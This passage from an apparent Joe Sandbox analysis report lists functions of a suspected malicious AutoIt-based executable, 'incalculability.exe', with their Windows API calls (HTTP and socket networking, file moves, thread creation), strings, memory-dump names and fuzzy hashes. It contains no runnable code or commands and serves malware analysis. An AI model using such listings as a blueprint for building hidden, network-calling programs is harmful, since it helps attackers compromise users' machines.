                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                            • String ID: close all
                            • API String ID: 4174999648-3243417748
                            • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                            • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                            • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                            • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                            Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                            • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                            • String ID:
                            • API String ID: 1291720006-3916222277
                            • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                            • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                            • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                            • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                            Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                            • IsMenu.USER32(?), ref: 0045FC5F
                            • CreatePopupMenu.USER32 ref: 0045FC97
                            • GetMenuItemCount.USER32(?), ref: 0045FCFD
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                            • String ID: 0$2
                            • API String ID: 93392585-3793063076
                            • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                            • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                            • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                            • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                            Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                            • VariantClear.OLEAUT32(?), ref: 00435320
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                            • VariantClear.OLEAUT32(?), ref: 004353B3
                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                            • String ID: crts
                            • API String ID: 586820018-3724388283
                            • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                            • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                            • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                            • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                            Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\inhumate\incalculability.exe,0040F545,C:\Users\user\AppData\Local\inhumate\incalculability.exe,004A90E8,C:\Users\user\AppData\Local\inhumate\incalculability.exe,?,0040F545), ref: 0041013C
                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                            • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                            • _wcscat.LIBCMT ref: 0044BCAF
                            • _wcslen.LIBCMT ref: 0044BCBB
                            • _wcslen.LIBCMT ref: 0044BCD1
                            • SHFileOperationW.SHELL32(?), ref: 0044BD17
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                            • String ID: \*.*
                            • API String ID: 2326526234-1173974218
                            • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                            • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                            • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                            • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                            Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                            • _wcslen.LIBCMT ref: 004335F2
                            • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                            • GetLastError.KERNEL32 ref: 0043362B
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                            • _wcsrchr.LIBCMT ref: 00433666
                              • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                            • String ID: \
                            • API String ID: 321622961-2967466578
                            • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                            • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                            • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                            • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                            Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                            • API String ID: 1038674560-2734436370
                            • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                            • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                            • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                            • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                            Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                            • __lock.LIBCMT ref: 00417981
                              • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                              • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                              • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                            • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                            • __lock.LIBCMT ref: 004179A2
                            • ___addlocaleref.LIBCMT ref: 004179C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                            • String ID: KERNEL32.DLL$pI
                            • API String ID: 637971194-197072765
                            • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                            • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                            • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                            • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                            Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove$_malloc
                            • String ID:
                            • API String ID: 1938898002-0
                            • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                            • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                            • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                            • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                            Function 00448D38 Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                            • String ID:
                            • API String ID: 3771399671-0
                            • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                            • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                            • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                            • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                            Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                            • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                            • _memmove.LIBCMT ref: 0044B555
                            • _memmove.LIBCMT ref: 0044B578
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                            • String ID:
                            • API String ID: 2737351978-0
                            • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                            • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                            • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                            • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                            Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                            Download Yara Rule
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 0041523A
                            • __calloc_crt.LIBCMT ref: 00415246
                            • __getptd.LIBCMT ref: 00415253
                            • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                            • _free.LIBCMT ref: 0041529E
                            • __dosmaperr.LIBCMT ref: 004152A9
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                            • String ID:
                            • API String ID: 3638380555-0
                            • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                            • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                            • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                            • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                            Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 0046C96E
                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Variant$Copy$ClearErrorInitLast
                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                            • API String ID: 3207048006-625585964
                            • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                            • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                            • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                            • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                            Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                            • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                            • gethostbyname.WSOCK32(?), ref: 004655A6
                            • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                            • _memmove.LIBCMT ref: 004656CA
                            • GlobalFree.KERNEL32(00000000), ref: 0046575C
                            • WSACleanup.WSOCK32 ref: 00465762
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                            • String ID:
                            • API String ID: 2945290962-0
                            • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                            • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                            • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                            • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                            Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                            Download Yara Rule
                            APIs
